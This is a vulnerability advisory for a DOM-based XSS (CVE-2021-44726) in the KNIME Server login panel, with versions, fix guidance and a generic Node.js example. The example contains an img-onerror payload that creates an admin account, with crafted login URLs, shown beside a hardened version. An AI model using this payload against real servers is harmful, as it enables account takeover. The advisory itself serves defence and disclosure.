KNIME Server – DOM-based XSS in a login panel
DATE
10.12.2021
Affected Vendor
KNIME AG
Affected Product
KNIME Server – Enterprise software for putting your data science workflows into production – https://www.knime.com/knime-software
Vulnerable version
4.13.3, 4.12.4, 4.11.5
Fixed version
4.13.4, 4.12.5, 4.11.6
CVSS
Recommendations
Update to KNIME Server version 4.13.4, 4.12.5, or 4.11.6 (the fixed release of the 4.13, 4.12, or 4.11 line you are running).
Vulnerability details
The login panel of the KNIME Server web application, up to version 4.13.3 (and the 4.12 and 4.11 releases listed above), contains a DOM-based cross-site scripting (XSS) vulnerability: client-side JavaScript in the login page takes a value from the URL the browser opened and places it into the page in a way that lets it be interpreted as markup, so attacker-supplied JavaScript executes in the origin of the KNIME Server. Once exploited, the injected script can perform any action the victim user is allowed to perform.
If the victim user is an administrator, the script can be used to create a new administrator account.
To exploit the vulnerability, an attacker has to craft a URL to the login panel that carries the payload and convince the victim to open it.
No authentication is required to craft or deliver the URL. The impact, however, comes from targeting authenticated users (or users who then log in), because the script acts with the victim's session. Since the payload is processed entirely in the browser, it may never appear in server-side logs, for example when it is carried in the URL fragment.
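A generic illustration of the pattern described above, added here as an example: it is not KNIME's code and says nothing about how the KNIME login page is actually written. It models a login page whose client-side script reads a `message` parameter from the URL and writes it to the page, first in the vulnerable form (an HTML sink) and then in the hardened form (a text sink). The browser's `innerHTML` is modelled as a string so that it runs under Node. The host `knime-server.example`, the `message` parameter and the `/hypothetical/admin/users` endpoint are assumptions made for the demonstration only.

```javascript
// Added example, not KNIME's code: a generic DOM-based XSS pattern in a login
// panel, shown beside a hardened version. The browser HTML sink
// (element.innerHTML) is modelled as a string so the example runs under Node.

// DOM-XSS source: the untrusted value comes from the URL the victim opened.
// Both the query string and the fragment are checked, because the fragment
// never reaches the server and therefore never shows up in server logs.
function untrustedMessageFrom(pageUrl) {
  const u = new URL(pageUrl);
  const fromQuery = u.searchParams.get('message');
  if (fromQuery !== null) return fromQuery;
  const fragment = new URLSearchParams(u.hash.replace(/^#/, ''));
  return fragment.get('message') || '';
}

// VULNERABLE: attacker-controlled text is concatenated into HTML.
// In a browser this is: document.getElementById('login-msg').innerHTML = msg;
function renderLoginMessageVulnerable(pageUrl) {
  const msg = untrustedMessageFrom(pageUrl);
  return `<div id="login-msg">${msg}</div>`;
}

// Minimal HTML escaping for text placed inside an element body.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// HARDENED: the same value is treated as text and never parsed as HTML.
// In a browser this is: el.textContent = msg; escaping is what textContent
// gives you implicitly, the string form here just makes it visible.
function renderLoginMessageSafe(pageUrl) {
  const msg = untrustedMessageFrom(pageUrl);
  return `<div id="login-msg">${escapeHtml(msg)}</div>`;
}

// Constructed attacker payload (hypothetical endpoint). The script runs in the
// server's origin with the victim's session, so a same-origin request to an
// administrative endpoint carries the victim's cookies; this is the
// "create a new administrator" consequence described in the advisory.
const PAYLOAD =
  '<img src=x onerror="fetch(\'/hypothetical/admin/users\',' +
  '{method:\'POST\',credentials:\'include\',body:\'name=attacker&role=admin\'})">';

// The "specially crafted URL": same payload delivered two ways. The fragment
// variant behaves identically in the browser but is invisible to the server.
const CRAFTED_QUERY_URL =
  'https://knime-server.example/login?message=' + encodeURIComponent(PAYLOAD);
const CRAFTED_FRAGMENT_URL =
  'https://knime-server.example/login#message=' + encodeURIComponent(PAYLOAD);

console.log('vulnerable (query):   ', renderLoginMessageVulnerable(CRAFTED_QUERY_URL));
console.log('vulnerable (fragment):', renderLoginMessageVulnerable(CRAFTED_FRAGMENT_URL));
console.log('hardened:             ', renderLoginMessageSafe(CRAFTED_QUERY_URL));
```

Run it with `node dom_xss_login.js`: the vulnerable renderer emits the `<img ... onerror=...>` tag verbatim for both URLs, while the hardened renderer emits `&lt;img ...&gt;`, which a browser displays as text. Two practical points follow from the example. First, because the fragment variant never leaves the browser, reviewing server access logs is not a reliable way to tell whether this class of bug was exploited; the check is a review of the client-side code for sources (`location.search`, `location.hash`, `document.referrer`) flowing into sinks (`innerHTML`, `document.write`, `eval`, `setAttribute` on event handlers). Second, a Content-Security-Policy that disallows inline script would have blocked the `onerror` handler even with the vulnerable sink in place, so it is worth deploying as defence in depth alongside the version update.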
CVE
CVE-2021-44726
Credits
Dawid Czarnecki